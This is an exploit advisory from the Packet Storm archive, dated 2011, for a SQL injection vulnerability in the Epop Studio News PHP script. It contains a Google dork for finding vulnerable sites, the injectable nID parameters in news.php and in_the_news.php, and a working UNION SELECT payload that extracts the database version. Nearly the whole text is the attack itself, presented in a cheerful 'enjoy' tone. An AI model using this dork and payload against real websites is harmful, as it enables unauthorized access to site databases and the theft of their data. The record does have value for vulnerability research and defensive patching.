Epop Studio News SQL Injection

2011-06-02T00:00:00
ID PACKETSTORM:101932
Type packetstorm
Reporter Codeine
Modified 2011-06-02T00:00:00

Description

                                        
                                            `#########################################################  
# Title : Epop Studio News SQLI  
# Author: Codeine  
# Vendor: Epop Studio[http://epopstudio.com/]  
# Email : f3codeine[at]yahoo[dot]com  
# Date : 06/01/2011  
# Google Dork : intext:Site By epop studio | inurl:news.php?nID=   
# Category : PHP [SQli]   
#########################################################   
  
[*]Injecton Point:  
http://www.site.com/in_the_news.php?nID='1  
http://www.site.com/news.php?nID='1  
  
[*]Exploit:  
http://www.site.com/in_the_news.php?nID=-276 union select 1,@@version,3,4,5,6,7,8--  
  
#########################################################  
# Greetz: Hidden  
# Enjoy ^_^  
#########################################################  
  
  
  
  
`